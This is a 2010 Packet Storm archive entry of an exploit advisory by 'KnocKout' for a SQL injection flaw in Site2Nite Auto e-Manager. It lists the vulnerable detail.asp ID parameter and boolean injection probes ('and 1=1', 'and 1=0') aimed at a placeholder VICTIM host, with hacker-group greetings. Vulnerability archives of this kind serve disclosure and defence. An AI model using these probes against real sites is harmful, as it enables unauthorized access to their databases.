Site2Nite Auto E-Manager SQL Injection

2010-10-11T00:00:00
ID PACKETSTORM:94608
Type packetstorm
Reporter KnocKout
Modified 2010-10-11T00:00:00

Description

                                        
                                            `==================================================  
Auto e-Manager <= SQL Injection Vulnerability  
==================================================  
  
~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockoutr@msn.com  
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB  
{ H4X0RE SECURITY PROJECT }  
~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~Web App. : Auto e-Manager  
~Software: http://www.site2nite.com/  
~Vulnerability Style : SQL Injection  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
~~~~~~~~ Explotation~~~~~~~~~~~  
  
http://VICTIM/www/detail.asp?ID=654 {SQL Injection}  
http://VICTIM/www/detail.asp?ID=654 and 1=1 {True}  
http://VICTIM/www/detail.asp?ID=654 and 1=0 {False}  
  
================================  
  
GoodLuck.  
  
`